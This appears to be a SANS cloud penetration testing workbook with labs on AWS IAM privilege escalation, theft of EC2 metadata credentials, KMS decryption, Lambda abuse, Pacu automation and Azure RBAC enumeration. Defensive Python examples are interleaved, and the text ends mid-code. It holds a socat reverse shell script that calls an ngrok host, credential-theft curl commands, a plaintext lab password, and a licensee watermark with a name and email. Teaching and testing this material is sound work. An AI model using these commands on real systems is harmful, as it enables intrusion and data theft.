AWS IAM can be very complex, with many options to configure permissions in various different places. While that complexity can be managed through advisory-type software, most often permissions are set very loosely. This lab will walk you through leveraging keys and elevating privileges to be able to eventually obtain access to data.

There are a few IAM mechanisms that we will explore, including looking at versioning and looking at using EC2.

A diagram of what we are going to attempt in this lab is found below.

Requirements for This Lab

This lab would require you to have completed all of the Day 1 exercises; however, we will be reviewing many of the topics in the prerequisite sections. This lab does require connectivity to our AWS environment.

It will also require that we have our AWS tools in our VM installed. You can check this by typing the following command in the CLI and looking for the aws help message:

$ aws

Try It Yourself

1. Review your policy set
2. Find an EC2 Instance Profile that you can leverage
3. Run an EC2 instance that contains your user private key to login

Walkthrough

Getting started

We will begin our lab where we left our previous labs. In Lab 2.1 we leveraged an AWS CLI token and now we wish to get further access. Open a MATE Terminal:

The first item that we will wish to review is the ability for us to see the secret data:

$ cat /home/sec588/files/workdir/secretdata.txt
This file appears to be base64 encoded. We can tell by the format: the encoding uses only the following characters: a-z, A-Z, 0-9, +, /. We can also tell by the fact that there is padding of = used. Let's run this through the base64 decoder in our system to see if this is text or something else:

$ base64 -d /home/sec588/files/workdir/secretdata.txt

The file will print garbage instead of text. This is indicative that there is something special about this file. Maybe this file is encrypted? Amazon does provide a Key Management Service to help protect data. Let's attempt to use it:
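The two tells the text relies on, the restricted alphabet and the = padding, can be checked programmatically, along with the follow-up question of whether the decoded bytes read as text or as an opaque blob such as a ciphertext. The Python below is an added example rather than workbook code; the two samples are constructed inline and stand in for secretdata.txt.

```python
import base64
import binascii
import re
import string

# Constructed samples (not the lab's secretdata.txt): one is base64 of readable
# text, the other is base64 of high-entropy bytes standing in for a KMS ciphertext.
PLAIN_SAMPLE = base64.b64encode(b"the quick brown fox jumps over the lazy dog\n").decode()
BINARY_SAMPLE = base64.b64encode(bytes(range(0, 256, 3)) + b"\x00\xff\x01\xfe").decode()

# Standard base64 alphabet (A-Z, a-z, 0-9, +, /) with at most two '=' pad characters at the end.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def looks_like_base64(text):
    """True if, ignoring line breaks, the text uses only the base64 alphabet,
    has a length that is a multiple of 4 and carries well-placed '=' padding."""
    compact = "".join(text.split())
    if not compact or len(compact) % 4 != 0:
        return False
    return bool(BASE64_RE.match(compact))


def decode_and_classify(text, printable_ratio=0.95):
    """Decode base64 and report whether the payload reads as text or as opaque bytes.
    Returns (kind, payload) where kind is 'text', 'binary' or 'not-base64'."""
    if not looks_like_base64(text):
        return ("not-base64", None)
    try:
        payload = base64.b64decode("".join(text.split()), validate=True)
    except binascii.Error:
        return ("not-base64", None)
    if not payload:
        return ("binary", payload)
    printable = sum(1 for b in payload if chr(b) in string.printable)
    kind = "text" if printable / len(payload) >= printable_ratio else "binary"
    return (kind, payload)


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("binary", BINARY_SAMPLE)):
        kind, payload = decode_and_classify(sample)
        print(f"{label}: {kind}, {len(payload)} decoded bytes")
```

A 'binary' verdict on a file that was clearly meant to be handed to a decoder is the cue the lab follows next: the payload is either compressed or encrypted, and a KMS ciphertext blob is exactly such an opaque byte string.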

$ aws kms list-keys --profile lab22

We can see that we are unable to leverage the system by getting an error:

(AccessDeniedException)

Finding a way to escalate privileges

What privileges do we have? IAM can be complicated: the user can have policies directly attached to them, and they can also have policies that are not attached but specified.

Listing out Bob's policies:

Note: if you are not sure of Bob's username you can always look it up. This command will allow us to get Bob's actual username:

$ aws iam get-user --profile lab22

| get-user: will get the user name for the current session you are in.

Armed with Bob's username we can now see Bob's policies:

$ aws iam list-user-policies --profile lab22 --user-name bob-<class-subdomain>

It would appear Bob has no direct policies. Let's see if he has any policy attachments:

$ aws iam list-attached-user-policies --profile lab22 --user-name bob-<class-subdomain>

REMEMBER: A user can have direct policies, but they can also have attached policies, and either one can provide additional rights and permissions.

Bob has one attached policy. Copy the ARN from the previous command. Let's now look at his policy.

Attempt to run this command:

$ aws iam get-policy-version --profile lab22 --policy-arn <from previous command> --version-id v1

If the command shows you that it does not work, for example:

Try additional versions v2, v3, ... In our labs we had up to v6.

A user can have up to 5 policies, no more. Look at all the policies, do any of them reflect KMS?
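Reading every version of a managed policy by hand, as above, is tedious and easy to get wrong. As an added example (not the workbook's code; the policy documents are constructed and are not Bob's real policy), the Python below takes a set of policy versions shaped like `aws iam get-policy-version` output and reports, per version, which grants matter for this lab: KMS decrypt, the iam:PassRole plus ec2:RunInstances pair, and Lambda invocation. Wildcard actions such as `kms:*` are expanded with shell-style matching, which is how IAM treats them.

```python
from fnmatch import fnmatch

# Constructed policy versions standing in for the documents that
# `aws iam get-policy-version --version-id vN` would return (not the lab's real policy).
POLICY_VERSIONS = {
    "v1": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "s3:ListBucket", "Resource": "*"}]},
    "v2": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["ec2:Describe*", "ec2:RunInstances",
                                        "ec2:CreateKeyPair", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["iam:GetUser", "iam:List*", "iam:GetPolicyVersion"],
         "Resource": "*"}]},
    "v3": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "kms:*", "Resource": "*"},
        {"Effect": "Deny", "Action": "kms:ScheduleKeyDeletion", "Resource": "*"}]},
}


def allowed_actions(policy):
    """Collect every action pattern that an Allow statement grants. Deny statements are
    skipped here: a Deny only narrows an Allow, and the Allow is what the reviewer must see."""
    actions = set()
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        act = stmt.get("Action", [])
        actions.update([act] if isinstance(act, str) else act)
    return actions


def grants(actions, wanted):
    """True if any granted pattern (e.g. 'kms:*', 'ec2:Run*') matches the wanted action, case-insensitively."""
    return any(fnmatch(wanted.lower(), pattern.lower()) for pattern in actions)


def findings_for(policy):
    """Return the findings relevant to this lab's escalation path for one policy document."""
    acts = allowed_actions(policy)
    out = []
    if grants(acts, "kms:Decrypt"):
        out.append("can decrypt with KMS")
    if grants(acts, "iam:PassRole") and grants(acts, "ec2:RunInstances"):
        out.append("can launch EC2 with an arbitrary instance profile (PassRole + RunInstances)")
    if grants(acts, "lambda:InvokeFunction"):
        out.append("can invoke Lambda functions")
    return out


def audit_policy_versions(versions):
    """Map each version id to its findings, so a reviewer sees which revision introduced a risky grant."""
    return {vid: findings_for(doc) for vid, doc in versions.items()}


if __name__ == "__main__":
    for vid, findings in audit_policy_versions(POLICY_VERSIONS).items():
        print(vid, "->", findings or ["nothing of note"])
```

Only the default version is in force, but every stored version is readable with iam:GetPolicyVersion and can be made default by anyone with iam:SetDefaultPolicyVersion, which is why a review has to cover all of them rather than just the one currently applied.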
We can however look at other services that we have access to. We have a few options available to us: we have EC2, and we have the PassRole option available to use as well.

Reviewing EC2 Instances

EC2 systems can have their own policy permissions. This is done so that EC2 instances can then talk to other AWS services. Given the limited set of privileges we have, let's explore what role assignments may be in use by starting with looking at the EC2 instances:

$ aws ec2 describe-instances --profile lab22 --query 'Reservations[].Instances[]' | jq '.[] | "\(.InstanceId) || \(.IamInstanceProfile.Arn)"'

We now see that we have several instances with several IamInstanceProfiles attached. Did you happen to notice an instance with the name KMS in it?

arn:aws:iam::<numbers>:instance-profile/ec2-kms-<class-subdomain>
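The jq filter above prints one line per instance. What a defender wants from the same describe-instances output is the subset of instances that carry a profile and still answer plain IMDSv1 requests, because those are the ones whose role credentials a simple GET from the box can read. As an added example (not workbook code; the output document, instance IDs and ARNs are constructed), this Python does that using the MetadataOptions.HttpTokens field that describe-instances returns.

```python
import json

# Constructed `aws ec2 describe-instances` style output (not the lab account).
# HttpTokens "required" means IMDSv2 only; "optional" still serves IMDSv1.
DESCRIBE_OUTPUT = json.loads("""{
 "Reservations": [
  {"Instances": [
    {"InstanceId": "i-0aaa111",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/web"},
     "MetadataOptions": {"HttpTokens": "optional", "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0bbb222",
     "MetadataOptions": {"HttpTokens": "required", "HttpEndpoint": "enabled"}}
  ]},
  {"Instances": [
    {"InstanceId": "i-0ccc333",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/ec2-kms"},
     "MetadataOptions": {"HttpTokens": "required", "HttpEndpoint": "enabled"}}
  ]}
 ]}""")


def instances_with_profiles(describe_output):
    """Return (InstanceId, profile ARN, HttpTokens) for every instance that carries an
    instance profile; profile-less instances are skipped, unlike the jq one-liner
    which prints null for them."""
    rows = []
    for reservation in describe_output.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            profile = inst.get("IamInstanceProfile")
            if not profile:
                continue
            tokens = inst.get("MetadataOptions", {}).get("HttpTokens", "optional")
            rows.append((inst["InstanceId"], profile["Arn"], tokens))
    return rows


def imdsv1_exposed(describe_output):
    """Instance IDs whose role credentials are reachable with an unauthenticated IMDSv1 GET."""
    return [iid for iid, _, tokens in instances_with_profiles(describe_output) if tokens != "required"]


def profiles_matching(describe_output, needle):
    """Instances whose profile ARN contains `needle` (case-insensitive), e.g. 'kms'."""
    return [(iid, arn) for iid, arn, _ in instances_with_profiles(describe_output)
            if needle.lower() in arn.lower()]


if __name__ == "__main__":
    for iid, arn, tokens in instances_with_profiles(DESCRIBE_OUTPUT):
        print(f"{iid} {arn} HttpTokens={tokens}")
    print("IMDSv1 exposed:", imdsv1_exposed(DESCRIBE_OUTPUT))
```

Requiring IMDSv2 (HttpTokens=required) does not stop someone who already has a root shell on the instance, as in the next lab, but it does close the classic SSRF-to-credentials path, and the inventory above is the quickest way to find the hosts where it is still off.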

Let's record some values from the instance ID which we believe has this particular ARN. Count the row in which the KMS ARN shows up, then count the same number in the first command to get the InstanceId:

$ aws ec2 describe-instances --instance-id <id from> --profile lab22 --output table

Let's grab the following items:

Under Network Interfaces record the: SubnetId

Under Security Group grab the: GroupId

Record these two items, which we will need to use to create our OWN EC2 instance. We will use this in an exercise coming up.

We have an EC2 instance that is potentially running with a permission set that could provide us with the right permissions to do some type of action with KMS. While KMS appears in the name, there is no other real way, with the permissions we have, to determine what this role can do. What we can do is attach this role to an instance we control, which will allow us to attempt to execute KMS-level functions. Since we have PassRole and several EC2 instance permissions, we can attempt to launch an EC2 instance which we can then SSH into and read the instance metadata service token. We can use the AMI below of an Ubuntu 18.04 image to attach to:

"Resource": "arn:aws:ec2:*::image/ami-00a208c7cdba991ea"

What we will be doing here is creating an EC2 instance that we can then SSH into. Let's create an SSH key first:

Your instructor will provide you a number; replace X with that number.

For vLive, Simulcast, and OnDemand students we recommend that you create a key based on the following variables: 1XXX where XXX is the last octet of your computer's IP address on the internet. You can use www.ipchicken.com (http://www.ipchicken.com) to find out your IP address. For individuals with IP addresses below 100 you can use 0's; for example, for an address that ends in 88 you can use 1088 as your student number.

$ aws ec2 create-key-pair --profile lab22 --key-name studentX-<class-subdomain> --query 'KeyMaterial' --output text > /home/sec588/files/workdir/studentX-<class-subdomain>.pem

Now with that key we can use the values recorded above to launch an EC2 instance:

$ aws ec2 run-instances --profile lab22 --image-id ami-00a208c7cdba991ea --iam-instance-profile Arn=<Arn from the ec2-kms-class-subdomain> --key-name studentX-<class-subdomain> --subnet-id <subnetId> --security-group-ids <GroupId> --output table

This process may take up to 5 minutes. RECORD THE INSTANCE ID.

Note the instance ID in the output. Once the system is launched you will be able to SSH to it via its public IP address. IMPORTANT: We will also be using the InstanceId in future labs!

$ aws ec2 describe-instances --instance-id <InstanceId> --profile lab22 --output table

Scroll through and look for a public IP address.

$ chmod 600 /home/sec588/files/workdir/studentX-<class-subdomain>.pem

$ ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<PublicIpAddress>

Please note the following pieces of data to be used later:

1. Your Instance ID.
2. Your Instance IP Address.

Now that this instance is running, we will be stopping this exercise and continuing it in the next lab.

Why This Lab Is Important

There are many ways to perform privilege escalations in IAM. Some of the ways involve leveraging versioning of the user's profile; other times it will be to take key material for services. The services include items like EC2 tokens and Lambda tokens!

This lab has shown us that while we may not think that a permission is harmless, a skilled attacker could take a seemingly restrictive permission and abuse it to accommodate what they are after. We will also see how this permission set can be abused further.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 2.5: Privilege Escalations through IAM - Part 2

Brief Intro

Throughout this course you will be interacting with many of the Amazon Web Services APIs. We discovered an AWS key string potentially in our Day 1 Lab 4 exercise. Let's see if we can actually attempt to use those particular keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can help us get further into the environment.

A diagram of what we are going to attempt in this lab is found below.

Requirements for This Lab

This lab requires the student to have:

Finished Lab 2.4
Have an EC2 Instance Running
Are able to SSH into that instance using their private key.

Try It Yourself

If you wish to try this on your own:

1. Copy the AWS EC2 Service Token by leveraging the AWS IAM Metadata Key
2. The Metadata token will allow you to list out KMS keys
3. Decrypt the secretdata.txt file by leveraging KMS to perform the operation on your behalf
4. List out AWS Lambda Functions
5. Execute the function called 'lambda-<class_subdomain>'
6. Find the secrets in each case.

Walkthrough

Getting started

This lab should pick us up where we left off. We should be able to have SSH access to our environment:

$ ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<PublicIpAddress>

From this machine we have full root permissions. This can be confirmed by running a few root commands:

$ sudo ls /root

There will be no password set for sudo on this device. This device can also laterally move around the environment as it is in a VPC that is adjacent to other nodes. Open a new MATE window and let's look for an IP address that is considered private:

$ aws ec2 describe-instances --profile lab22 | jq '.Reservations[].Instances[] | "\(.InstanceId) \(.PrivateIpAddress)"'

None of the instances may allow 'ping'; however, if you attempt SSH to one of them you will get a login prompt or SSH key accept prompt. These instances, while potentially not available to the public, are internal, and may allow for lateral movement.

$ ssh 10.10.10.X

There may also be databases and other services not externally available but internally available.

Getting a Service Token and using our new Identity

Let's however try and obtain the keys to elevate our privileges, from the EC2 instance we are in:

$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials

The output will not look very well formed; it may show up like this:

ec2-kms-role-<class-subdomain>ubuntu@<ip>

We need to copy the role name up to the word ubuntu and then add this to the next query:

$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-subdomain>; printf "\n"

The output will reflect as follows:

{
  "Code" : "Success",
  "LastUpdated" : "<Time>",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIXXXXXXXXXXXX",
  "SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXX",
  "Token" : "XXXXXXXXXXXXXXXXXXXX/////////XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "Expiration" : "<Time>"
}

Elevation of access to decrypt the KMS data

Now that we have a valid Token with Access Key ID we can go ahead and move those into the appropriate locations. Open a new terminal window. By performing these commands we are now going to be logging into EC2 as this new user. From that window open your favorite text editor and edit /home/sec588/.aws/credentials

Here is an example of using nano:

nano /home/sec588/.aws/credentials

Go to the end of the file and add the following items:

[lab25]
aws_access_key_id = <AccessKeyIdHere>
aws_secret_access_key = <SecretAccessKey>
aws_session_token = <Token>

Then open the file /home/sec588/.aws/config with your favorite editor and add the following section at the end:

[profile lab25]
region = us-east-1

With our new token, let's see if we can now 'solve our previous challenge'. Can we list KMS keys?

aws kms list-keys --profile lab25
To see if the decrypt is possible we can ask KMS to use its own knowledge of available keys to perform decrypt operations:

aws kms decrypt --profile lab25 --ciphertext-blob fileb://<(cat /home/sec588/files/workdir/secretdata.txt | base64 -d) --output text --query Plaintext | base64 -d > unsecretdata.txt

You should now be able to run cat unsecretdata.txt and it would reveal our 'secret data!'
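The credential copy performed in this section is exactly what a defender wants to catch: an instance role's temporary keys being used from somewhere other than the instance. CloudTrail records the role session name of an instance-profile session as the instance ID, which is what ties each API call back to the EC2 host that should have made it. As an added example (not part of the workbook or the lab environment), the Python below runs that check over constructed CloudTrail-style records; the account number, instance ID, role name and IP addresses are made up.

```python
import json

# Constructed CloudTrail records (not real lab telemetry). The first call comes from the
# instance's own public IP; the next two come from an outside address using the same session.
SAMPLE_EVENTS = json.loads("""[
 {"eventName": "ListKeys", "eventSource": "kms.amazonaws.com", "sourceIPAddress": "52.0.0.10",
  "userIdentity": {"type": "AssumedRole",
    "arn": "arn:aws:sts::111122223333:assumed-role/ec2-kms-role/i-0abc123def4567890"}},
 {"eventName": "Decrypt", "eventSource": "kms.amazonaws.com", "sourceIPAddress": "198.51.100.44",
  "userIdentity": {"type": "AssumedRole",
    "arn": "arn:aws:sts::111122223333:assumed-role/ec2-kms-role/i-0abc123def4567890"}},
 {"eventName": "Invoke", "eventSource": "lambda.amazonaws.com", "sourceIPAddress": "198.51.100.44",
  "userIdentity": {"type": "AssumedRole",
    "arn": "arn:aws:sts::111122223333:assumed-role/ec2-kms-role/i-0abc123def4567890"}},
 {"eventName": "ListUserPolicies", "eventSource": "iam.amazonaws.com", "sourceIPAddress": "198.51.100.44",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/bob"}}
]""")

# Constructed inventory: the public IP(s) each instance is expected to call AWS APIs from.
INSTANCE_PUBLIC_IPS = {"i-0abc123def4567890": {"52.0.0.10"}}


def session_instance_id(arn):
    """Return the role-session name if it looks like an EC2 instance ID, else None.
    Instance-profile sessions use the instance ID as the session name."""
    session = arn.rsplit("/", 1)[-1]
    return session if session.startswith("i-") else None


def find_exfiltrated_role_use(events, inventory):
    """Flag API calls made with an instance role's credentials from an IP the instance does not own.
    Returns (instance id, event source, event name, source ip) tuples in log order."""
    hits = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        if ident.get("type") != "AssumedRole":
            continue
        iid = session_instance_id(ident.get("arn", ""))
        if iid is None:
            continue
        src = ev.get("sourceIPAddress", "")
        if src.endswith(".amazonaws.com"):  # service-to-service calls carry a service hostname, not an IP
            continue
        if src not in inventory.get(iid, set()):
            hits.append((iid, ev["eventSource"], ev["eventName"], src))
    return hits


if __name__ == "__main__":
    for iid, source, name, ip in find_exfiltrated_role_use(SAMPLE_EVENTS, INSTANCE_PUBLIC_IPS):
        print(f"{iid} credentials used from {ip}: {source} {name}")
```

The inventory lookup is the weak point of this detector: instances behind a NAT gateway share an egress IP, so the map has to be built from the VPC's actual egress addresses rather than from each instance's PublicIpAddress alone.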

Additional Privileges with Lambda!

This particular profile role has Lambda privileges. We can uncover this by just attempting to try the following:

aws lambda list-functions --profile lab25

You could see a Lambda function called:

lambda-<class-subdomain>

Let's execute this function and see if it will work with an empty payload:

aws lambda invoke --function-name lambda-<class-subdomain> --profile lab25 ./lambda-out.txt

If this is successful you would see the following command work:

cat ./lambda-out.txt

What permissions are needed to perform these actions

The following permissions allowed us to perform these actions:

"lambda:ListFunctions",
"lambda:InvokeFunction",
"lambda:InvokeAsync"

For the KMS we just need decrypt and list permissions:

"kms:EnableKey",
"kms:Decrypt",
"kms:ListKeyPolicies",
"kms:ListRetirableGrants",
"kms:ListGrants",
"kms:ListKeys",
"kms:Encrypt",
"kms:ListAliases",
"kms:CreateKey"

Without that many rights we can perform a lot of damage, so we should be cautious and careful with these keys and permissions.

Why This Lab Is Important

In the last 2 labs we have gone from a non-privileged, or less than privileged, AWS user to a user that has the capability to perform additional functions. By performing these operations we should be able to gain more access to the AWS environments, and we can show the criticality of why these keys need to be protected.

Additional Resources

We always recommend learning how to harden your environments, and as such we recommend our Secure DevOps and Cloud Automation course to help you on this journey:

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 2.6: Rhino Security's Pacu

Brief Intro

Pacu is a tool that will allow us to automate the enumeration, exploitation and discovery of services in Amazon Web Services (AWS). Much of the previous labs can be automated using the Pacu tool. While the tool is not without its small limitations, the tool does provide automation in many of the manual workflows we have done. Leveraging the Pacu tool we can weaponize keys that we have found.

Requirements for This Lab

This lab requires the student to have:

Finished Labs 2.4 and 2.5, have a set of API keys that are current in time, and can validate that the commands for lab25 are still working.

Try It Yourself

If you wish to try this on your own:

1. Run Pacu and create a new session
2. Import all of your keys
3. Enumerate your IAM permissions
4. Replicate the passing of a new instance profile like Lab 2.5
5. Enumerate Lambda functions
6. List out the data for each of these commands, specifically Lambda. The command would be data Lambda

Walkthrough

Let's open the MATE terminal so that we can launch Postman

Once the terminal is open type the following commands:

cd /opt/pacu

To ensure that we do not have data that is corrupt we will type the following commands:

rm sqlite.db
rm -Rf sessions
mkdir sessions

To run Pacu type the following command:

python3 pacu.py

This will create a new database. The first question you will get is to provide the session with a name. The name we will give it is lab26:

Name this session? lab26

Importing the Keys

Pacu allows you to get access to existing credentials. To do this we can run a few commands:

>import_keys --all

This command will import the two keys you have in your existing AWS credentials file. Let's swap to lab22:

>swap_keys

Choose lab22 by typing the number 1.

Let's see how we can run some commands. First let's set our region, but what region will we use? We are currently in us-east-1 unless your instructor has told you otherwise. The regions command will show you all regions:

>regions

To set this to region us-east-1, which will tune our scans to just the single region instead of all regions and make our labs faster:

>set_regions us-east-1

Running the Modules

To list out all the modules type the following command:

>ls

We can see a fairly large number of modules. Let's look at the iam__enum_permissions module.

>help iam__enum_permissions

We now see a few options that allow us to target specific users or roles. For now, let's just run the module as is.

>run iam__enum_permissions

It runs, and provides us with data, but where is the data? This module only confirms that you have permissions.

>run iam__enum_users_roles_policies_groups

This module leverages the IAM enum permissions to give us all the data; however, it is not able to display it all on the screen.

>data

One more item: let's replicate one of our earlier labs. Can we replicate a version change automatically?

>run iam__privesc_scan

We can actually do this. This tool will help us run the aws command to replace our access using the right privileges.

Let's choose the following:

ec2-kms-instance-profile-<class-subdomain>

Do you recall seeing this from Lab 2.5? It is because we actually have this instance profile mapped to us.

Now let's choose 4; let's attempt to use the SSH Create an EC2 function to get the credentials. This will create the EC2 instance, it will give you the IP address of the request, and it will also print out the private key. All of this has to be put together in one piece to be able to get the same result as Lab 2.5.

© 2020 Moses Frost 103


Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020
© SANS Institute 2020

3e1e3b497543e6c11ac8e4188959c93e

20
, 20
28
pauljones166@outlook_com

ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66

Lambda listings

Next, let's see if we can enumerate Lambda functions:

>run lambda__enum

This will fail: we do not have the rights. We did, however, have a user that had the appropriate rights, so let's see
how we can change to a valid user:

>swap_keys

Choose option 2, which is lab25.

>run lambda__enum

We have now enumerated the Lambdas. To see this, let's type data, but this time we will specify the service:

>data Lambda

The L in Lambda has to be uppercase.

There are many other options in Pacu, as you can see.

If you have additional time

Getting a Proxy Client to be staged

If you have time, there are specific commands that allow you to run a proxy client; the proxy can provide a
reverse shell back to your system. To use the proxy client you will need a few things:

1. A registered ngrok account. It can be a free account; make sure you have completed this from yesterday's lab.

2. Open terminal 1 and start ngrok with the following command:

ngrok tcp 9998

3. Open terminal 2 and start a socat listener in a DIFFERENT shell:

socat file:`tty`,raw,echo=0 tcp-listen:9998,fork,reuseaddr

4. Open terminal 3; you may have to resolve the ngrok TCP endpoint to an IP address for socat:

nslookup X.tcp.ngrok.io

Record this value as ngrok ip.

NOTE: X will be a number, and it can change! Because the instance may have DNS resolution issues, you may
need to use the IP, not the DNS name.

5. Build a script like so:

#!/bin/bash
sudo apt update
sudo apt install socat -y
socat tcp-connect:<ngrok ip>:<ngrok port> exec:/bin/sh,pty,stderr,setsid,sigint,sane

6. Save the script file as script.txt. This is all done from /home/sec588/files/workdir.

7. Make sure Pacu is running and run the following command. Remember that lab22 is the user with the rights; you
may need to swap_keys.

run ec2__startup_shell_script --instance-ids <instance id from lab 2.4 and 2.5>@us-east-1 --script /home/sec588/files/workdir/script.txt

8. The shell will take up to 5 minutes to appear, because the module writes the script as instance user data and
the instance has to be stopped and started for it to run. Note that the stop/start is recorded in CloudTrail
(StopInstances, ModifyInstanceAttribute, StartInstances) and interrupts whatever the instance was doing, so on a
real engagement this is a noisy step.


Conclusion

Throughout this lab, we walked through what it would take to automate an attack on AWS with proper tooling.
The tooling for many of these items does not necessarily exist yet, as many of these technologies are nascent. The
more we see these technologies be attacked, the better our toolsets will become.

Why This Lab Is Important

Pacu gives us the capability to automate the testing of an AWS account's set of permissions. Quite often the
complexity of the AWS system leaves administrators with a false sense of security, while tokens and API keys
proliferate.

Lab 3.1: Azure AD and RBAC Roles

Brief Intro

We will be playing around with Azure AD and the different RBAC roles that exist, to understand a bit about Azure AD
permissions and the different RBAC roles. We will be using the Azure CLI tools that we have installed, as well as the
Azure Portal, to look at the permissions on the system.

There are several ways we can manage Azure resources:

Manage the resources through the web portal
Manage the resources through the az CLI; it is cross-platform and doesn't require PowerShell
Manage the resources through .NET
Manage the resources through the PowerShell AzureRM and Az modules; this does require PowerShell

For the majority of our tools we will be using the az CLI tool. We will, however, also be using the web interface, and
we will also show you how to get Windows command execution in an upcoming exercise.

Requirements for This Lab

This lab requires the student to have:

The az CLI installed and working
The Firefox browser installed and working

Try It Yourself

If you wish to try this on your own:

1. Use az login to log in via a web browser and through the CLI.
2. Use the tool to list users and to list the roles that the users have on resources.
3. List the virtual machines in the system, their associated disks, their associated snapshots, and their associated
backups.
4. Log in via the browser and list the Azure AD Domain Services resources.

Walkthrough

Let's open the MATE terminal so that we can launch az.

Once the terminal is open, type the following commands.

Let's explore the Azure login options:

$ az login -h

Here we can see that there are a few options. One option is the following:

$ az login

This allows us to log in using the web browser. It will open Firefox; choose to sign in as a new user, or if prompted
log in with the username summer@sec588.com and the password SnakeJazz2020.

Once you log in, you will not be returned to the terminal; you need to manually click on it to see the successful
login.

This is just one way to log in, but it requires the browser interface to be available. What if you needed a different
option to log in, such as one in which you did not have a web browser or a GUI fallback option?

$ az logout

Here is a different login option, where you pass the username and password on the command line. Be aware that a
password passed this way ends up in your shell history:

$ az login -u summer@sec588.com -p SnakeJazz2020

Now that we are in, we can attempt to understand what permissions we may have for this user.

First, let's take a tour of the different Azure Active Directory commands. With Azure Active Directory we can see our
users and some of their profile information:

$ az ad --help

If you look, there are several subcommands for az ad, such as user, as well as app and sp. We will use some of these
in a bit; let's look at user:

$ az ad user --help

Now let's take a look at the list of users on the system. The first command will show you a JSON array, which may be
difficult for you to manipulate; instead, let's use table format, as in the second command:

$ az ad user list

$ az ad user list -o table

Now you may notice that this table is rather difficult to work with as is. To make the table more manageable, we can
fix that:

$ az ad user list --query '[].{DisplayName:displayName,UserPrincipalName:userPrincipalName,UserType:userType}' -o table

The command above allowed us to manipulate the output by filtering down what is displayed, as well as naming the
columns differently. The query syntax is JMESPath (http://jmespath.org/tutorial.html).

Now we can see all the users that are on the system, which ones are guests and which ones are members. But what
permissions do they have in Azure? For this we need a few more queries. We will look at the Azure roles first:

$ az role assignment list

This list is also a JSON array, so let's use the table format to get a better idea of the output:

$ az role assignment list -o table

It appears that Summer has a reader role in Azure. Note that az role assignment list shows Azure RBAC (resource)
role assignments; Azure AD directory roles such as Global Reader are separate and do not appear here. Let's try and
see what other resources we may have rights to.
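Reading a long role assignment table by eye gets slow once a subscription has more than a handful of principals. The following Python is an added example, not part of the workbook and not az's code: given the JSON that az role assignment list -o json produces (the field names principalName, principalType, roleDefinitionName and scope are the ones az emits), it groups assignments by principal, classifies each scope, and lists the principals that hold Owner, Contributor or User Access Administrator, widest scope first. The sample assignments are constructed; the subscription ID and the non-lab principal name are placeholders.

```python
"""Triage the output of `az role assignment list -o json`: who holds which Azure RBAC role, and where.

Added example, not part of the workbook and not az's code. Feed it the JSON that
`az role assignment list --all -o json > assignments.json` writes; the field names used
here (principalName, principalType, roleDefinitionName, scope) are the ones az emits.
SAMPLE_ASSIGNMENTS is constructed in that shape with placeholder IDs and names.
"""
import json

# Roles that amount to control of everything under the scope, or to granting it to yourself.
PRIVILEGED_ROLES = {"Owner", "Contributor", "User Access Administrator"}
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"

SAMPLE_ASSIGNMENTS = json.dumps([
    {"principalName": "summer@sec588.com", "principalType": "User",
     "roleDefinitionName": "Reader", "scope": SUB},
    {"principalName": "jerry@sec588.com", "principalType": "User",
     "roleDefinitionName": "Contributor", "scope": SUB + "/resourceGroups/example-resources"},
    {"principalName": "backup-automation", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Owner", "scope": SUB},
    {"principalName": "jerry@sec588.com", "principalType": "User",
     "roleDefinitionName": "Virtual Machine Contributor",
     "scope": SUB + "/resourceGroups/example-resources/providers/Microsoft.Compute/virtualMachines/dc1"},
])

SCOPE_ORDER = {"managementGroup": 0, "subscription": 1, "resourceGroup": 2, "resource": 3}


def scope_level(scope):
    """Classify an ARM scope string by how much it covers."""
    parts = [p for p in scope.split("/") if p]
    if not parts or parts[0] != "subscriptions":
        return "managementGroup"   # "/" or /providers/Microsoft.Management/managementGroups/<name>
    if len(parts) == 2:
        return "subscription"      # /subscriptions/<id>
    if len(parts) == 4:
        return "resourceGroup"     # /subscriptions/<id>/resourceGroups/<name>
    return "resource"


def summarize(assignments_json):
    """Group assignments per principal.

    Returns {name: {"type": principalType, "roles": [(role, level, scope), ...], "privileged": bool}}.
    """
    summary = {}
    for item in json.loads(assignments_json):
        name = item.get("principalName") or item.get("principalId", "?")
        entry = summary.setdefault(name, {"type": item.get("principalType"), "roles": [], "privileged": False})
        role = item.get("roleDefinitionName", "")
        scope = item.get("scope", "")
        entry["roles"].append((role, scope_level(scope), scope))
        if role in PRIVILEGED_ROLES:
            entry["privileged"] = True
    return summary


def privileged_principals(assignments_json):
    """Principals holding a privileged role, ordered by the widest scope at which they hold one."""
    ranked = []
    for name, entry in summarize(assignments_json).items():
        widths = [SCOPE_ORDER[level] for role, level, _ in entry["roles"] if role in PRIVILEGED_ROLES]
        if widths:
            ranked.append((min(widths), name))
    return [name for _, name in sorted(ranked)]


if __name__ == "__main__":
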